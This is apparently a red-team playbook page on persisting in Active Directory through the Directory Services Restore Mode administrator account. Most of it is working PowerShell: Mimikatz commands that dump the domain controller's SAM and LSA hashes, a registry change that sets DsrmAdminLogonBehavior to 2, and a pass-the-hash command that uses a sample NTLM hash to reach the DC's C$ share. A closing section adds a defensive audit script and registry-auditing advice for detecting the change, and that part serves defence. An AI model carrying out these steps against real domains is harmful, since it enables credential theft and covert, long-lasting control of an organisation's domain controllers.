# DSRM

## DSRM (Directory Services Restore Mode)

* When Active Directory Domain Services cannot boot, the DC falls back to a safe mode called DSRM, which uses a local administrator account on the DC named "Administrator" whose password is the DSRM password.
* The DSRM password (SafeModePassword) is set when a server is promoted to a DC and is rarely changed afterwards. After altering a registry setting on the DC, it is possible to pass the NTLM hash of this account to access the DC.
* This is the longest-lasting persistence method.
* The domain DPAPI backup key can be used to decrypt DPAPI protected credentials for any user.

Dump credentials (requires DA privileges):

{% code overflow="wrap" %}

```powershell
# Load Invoke-Mimi into a remoting session on the DC, then enter that session
$sess = New-PSSession dcorp-dc
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess
Enter-PSSession -Session $sess

# Inside the session: dump the local SAM of the DC (contains the DSRM Administrator)
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# Alternatively, run it against the DC directly from the attacker machine
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc
```

{% endcode %}

Compare that Administrator hash with the Administrator hash returned by the command below:

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
```

The first one (from the SAM) is the DSRM local Administrator.

Since this account is a local administrator of the DC, its hash can be passed to authenticate.

Before passing the hash, the logon behaviour of the DSRM account must be changed through the `DsrmAdminLogonBehavior` registry value (very noisy: the registry change itself is a reliable detection point).

{% code overflow="wrap" %}

```powershell
Enter-PSSession -Computername dcorp-dc

# Check if the value exists and read it.
# Absent or 0 = default (DSRM account usable only when booted into DSRM),
# 1 = logon allowed when the AD DS service is stopped,
# 2 = logon always allowed, including over the network.
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue

# Change the registry value on the DC (creates it if it does not exist)
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
```

{% endcode %}

Pass the hash:

{% code overflow="wrap" %}

```powershell
# On attacker machine
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

# Or access C$
ls \\dcorp-dc\C$
```

{% endcode %}
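Because the technique depends on `DsrmAdminLogonBehavior` being set to a non-default value, the cleanest detection is to audit that value on every DC. The script below is an added example, not part of the original playbook; it assumes the ActiveDirectory module and WinRM access to the DCs, and `$regPath`, `$valueName` and `$meaning` are names chosen here.

```powershell
# Added example: report any DC whose DsrmAdminLogonBehavior is not the default.
# Assumes the ActiveDirectory module is installed and WinRM is reachable on all DCs.
Import-Module ActiveDirectory

$regPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# Documented meanings of the value; absent or 0 is the secure default
$meaning = @{
    0 = 'Default: DSRM Administrator usable only when the DC is booted into DSRM'
    1 = 'Logon allowed while the AD DS service is stopped'
    2 = 'Logon always allowed, including over the network (enables pass-the-hash)'
}

$dcs = (Get-ADDomainController -Filter *).HostName

# Read the value on each DC; a missing value is reported as 0 (default)
$results = Invoke-Command -ComputerName $dcs -ScriptBlock {
    param($path, $name)
    $prop  = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    $value = 0
    if ($null -ne $prop) { $value = [int]$prop.$name }
    [pscustomobject]@{ DC = $env:COMPUTERNAME; Value = $value }
} -ArgumentList $regPath, $valueName

foreach ($r in $results) {
    $status = if ($r.Value -eq 0) { 'OK' } else { 'ALERT' }
    '{0,-6} {1,-20} {2} ({3})' -f $status, $r.DC, $r.Value, $meaning[$r.Value]
}

# Remediation once an ALERT is confirmed unauthorised: delete the value on that DC
# Invoke-Command -ComputerName <dc> -ScriptBlock { Remove-ItemProperty -Path $using:regPath -Name $using:valueName }
```

Pair this with registry auditing (SACL on the `Lsa` key plus event ID 4657, "A registry value was modified") so the change is caught when it happens rather than on the next scheduled audit.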
